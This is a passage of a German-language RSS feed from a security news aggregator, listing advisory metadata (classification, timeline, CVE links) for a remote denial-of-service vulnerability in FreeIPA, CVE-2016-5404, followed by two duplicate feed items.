Medium<br><h2>CPE</h2><ul><li><a href="https://web.nvd.nist.gov/view/vuln/search-results?cpe=cpe%3A%2Fa%3Afreeipa%3Afreeipa&amp;page_num=0&amp;cid=3">cpe:/a:freeipa:freeipa</a></li></ul><h2>Exploiting</h2><span>Klasse</span>: Denial of Service<br><span>Lokal</span>: Nein<br><span>Remote</span>: Ja<br><br><span>Verfügbarkeit</span>: Nein<br><br><span>Aktuelle Preisschätzung</span>: <span>$0-$1k (0-day) / $0-$1k (Heute)</span><br><h2>Gegenmassnahmen</h2><span>Empfehlung</span>: keine Massnahme bekannt<br><span>0-Day Time</span>: 0 Tage seit gefunden<br><h2>Timeline</h2><span>07.09.2016</span>  Advisory veröffentlicht<br><span>08.09.2016</span>  <a href="https://vuldb.com///vuldb.com/?id.91353">VulDB Eintrag erstellt</a><br><span>08.09.2016</span>  <a href="https://vuldb.com///vuldb.com/?id.91353">VulDB letzte Aktualisierung</a><br><h2>Quellen</h2><br><span>CVE</span>: CVE-2016-5404 <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5404">(mitre.org)</a> <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5404">(nvd.nist.org)</a> <a href="http://www.cvedetails.com/cve/CVE-2016-5404/">(cvedetails.com)</a><br><h2>Eintrag</h2><span>Erstellt</span>: 08.09.2016<br><span>Eintrag</span>: 69.7% komplett<br>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vuln: FreeIPA CVE-2016-5404 Denial of Service Vulnerability]]></title>
<description><![CDATA[FreeIPA CVE-2016-5404 Denial of Service Vulnerability]]></description>
<link>https://tsecurity.de/de/68690/sicherheitsluecken/vuln-freeipa-cve-2016-5404-denial-of-service-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/68690/sicherheitsluecken/vuln-freeipa-cve-2016-5404-denial-of-service-vulnerability/</guid>
<pubDate>Fri, 02 Sep 2016 14:30:58 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FreeIPA CVE-2016-5404 Denial of Service Vulnerability]]></content:encoded>
</item>
<item>
<title><![CDATA[Vuln: FreeIPA CVE-2016-5404 Denial of Service Vulnerability]]></title>
<description><![CDATA[FreeIPA CVE-2016-5404 Denial of Service Vulnerability]]></description>
<link>https://tsecurity.de/de/68690/sicherheitsluecken/vuln-freeipa-cve-2016-5404-denial-of-service-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/68690/sicherheitsluecken/vuln-freeipa-cve-2016-5404-denial-of-service-vulnerability/</guid>
<pubDate>Fri, 02 Sep 2016 14:30:58 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FreeIPA CVE-2016-5404 Denial of Service Vulnerability]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,08ms -->